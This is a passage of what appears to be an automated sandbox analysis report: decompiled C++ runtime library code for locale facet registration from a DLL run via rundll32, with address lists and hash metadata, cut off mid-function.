				E6E206653(_t462 - 0x14, 0);
				_t441 =  *0x6e2c6dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6E1E161C(0x6e2c6d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6E2066BA(_t462 - 0x14);
					return E6E220075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6E211230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t462 - 0x20);
							E6E223D74(_t462 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t430, _t441, 0x14);
							E6E206653(_t462 - 0x14, 0);
							_t442 =  *0x6e2c6dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6E1E161C(0x6e2c6d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6E2066BA(_t462 - 0x14);
								return E6E220075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6E2112B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t462 - 0x20);
										E6E223D74(_t462 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t327, _t431, _t442, 0x14);
										E6E206653(_t462 - 0x14, 0);
										_t443 =  *0x6e2c6dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6E1E161C(0x6e2c6d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6E2066BA(_t462 - 0x14);
											return E6E220075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6E211339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t462 - 0x20);
													E6E223D74(_t462 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t327, _t432, _t443, 0x14);
													E6E206653(_t462 - 0x14, 0);
													_t444 =  *0x6e2c6db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6E1E161C(0x6e2c6d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6E2066BA(_t462 - 0x14);
														return E6E220075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6E2113A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t462 - 0x20);
																E6E223D74(_t462 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t327, _t433, _t444, 0x14);
																E6E206653(_t462 - 0x14, 0);
																_t445 =  *0x6e2c6ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6E1E161C(0x6e2c6d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6E2066BA(_t462 - 0x14);
																	return E6E220075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6E211409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t462 - 0x20);
																			E6E223D74(_t462 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t327, _t434, _t445, 0x14);
																			E6E206653(_t462 - 0x14, 0);
																			_t446 =  *0x6e2c6de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6E1E161C(0x6e2c6d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6E2066BA(_t462 - 0x14);
																				return E6E220075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6E211471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t462 - 0x20);
																						E6E223D74(_t462 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t327, _t435, _t446, 0x14);
																						E6E206653(_t462 - 0x14, 0);
																						_t447 =  *0x6e2c6dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6E1E161C(0x6e2c6da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6E2066BA(_t462 - 0x14);
																							return E6E220075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6E2114EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t462 - 0x20);
																									E6E223D74(_t462 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t327, _t436, _t447, 0x14);
																									E6E206653(_t462 - 0x14, 0);
																									_t448 =  *0x6e2c6dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6E1E161C(0x6e2c6d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6E2066BA(_t462 - 0x14);
																										return E6E220075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6E211558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t462 - 0x20);
																												E6E223D74(_t462 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t327, _t437, _t448, 0x14);
																												E6E206653(_t462 - 0x14, 0);
																												_t449 =  *0x6e2c6e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6E1E161C(0x6e2c6dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6E2066BA(_t462 - 0x14);
																													return E6E220075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6E2115C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t462 - 0x20);
																															E6E223D74(_t462 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t327, _t438, _t449, 0x14);
																															E6E206653(_t462 - 0x14, 0);
																															_t450 =  *0x6e2c6dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6E1E161C(0x6e2c6d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6E1E171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6E2066BA(_t462 - 0x14);
																																return E6E220075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6E21162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6E1E1438(_t397);
																																		E6E223D74(_t462 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e26851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6e26c0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6E21542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6E220075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6E206FD3(__eflags, _t439);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6e2c6dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6E206FD3(__eflags, _t438);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6e2c6e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6E206FD3(__eflags, _t437);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6e2c6dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6E206FD3(__eflags, _t436);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6e2c6dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6E206FD3(__eflags, _t435);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6e2c6de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6E206FD3(__eflags, _t434);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6e2c6ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6E206FD3(__eflags, _t433);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6e2c6db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6E206FD3(__eflags, _t432);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6e2c6dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6E206FD3(__eflags, _t431);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6e2c6dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6E206FD3(__eflags, _t430);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6e2c6dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}




































                          0x6e20f6b3
                          0x6e20f6b3
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e4
                          0x6e20f6e9
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F6BA
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F6C4
                          • int.LIBCPMT ref: 6E20F6DB
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F6FE
                          • std::_Facet_Register.LIBCPMT ref: 6E20F715
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F735
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F753
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID: |m,n
                          • API String ID: 113178234-3550068666
                          • Opcode ID: 5737e51470b673c70df31574f447d02579a6ecdc7575a850be95af8181142fe4
                          • Instruction ID: fd568e27bc1ff9b3a391e1cd033205c842be542f981569738765c01386a0c0e3
                          • Opcode Fuzzy Hash: 5737e51470b673c70df31574f447d02579a6ecdc7575a850be95af8181142fe4
                          • Instruction Fuzzy Hash: F311CA7595051D9FCF01DBD4C894AEEB77BBF44714F240908E4106B2D0DB749A85C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t418 - 0x14, 0);
				_t399 =  *0x6e2c6dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6E1E161C(0x6e2c6d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6E2066BA(_t418 - 0x14);
					return E6E220075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6E2112B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t418 - 0x20);
							E6E223D74(_t418 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t389, _t399, 0x14);
							E6E206653(_t418 - 0x14, 0);
							_t400 =  *0x6e2c6dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6E1E161C(0x6e2c6d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6E2066BA(_t418 - 0x14);
								return E6E220075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6E211339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t418 - 0x20);
										E6E223D74(_t418 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t296, _t390, _t400, 0x14);
										E6E206653(_t418 - 0x14, 0);
										_t401 =  *0x6e2c6db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6E1E161C(0x6e2c6d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6E2066BA(_t418 - 0x14);
											return E6E220075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6E2113A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t418 - 0x20);
													E6E223D74(_t418 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t296, _t391, _t401, 0x14);
													E6E206653(_t418 - 0x14, 0);
													_t402 =  *0x6e2c6ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6E1E161C(0x6e2c6d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6E1E171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6E2066BA(_t418 - 0x14);
														return E6E220075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6E211409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t418 - 0x20);
																E6E223D74(_t418 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t296, _t392, _t402, 0x14);
																E6E206653(_t418 - 0x14, 0);
																_t403 =  *0x6e2c6de0; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6E1E161C(0x6e2c6d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
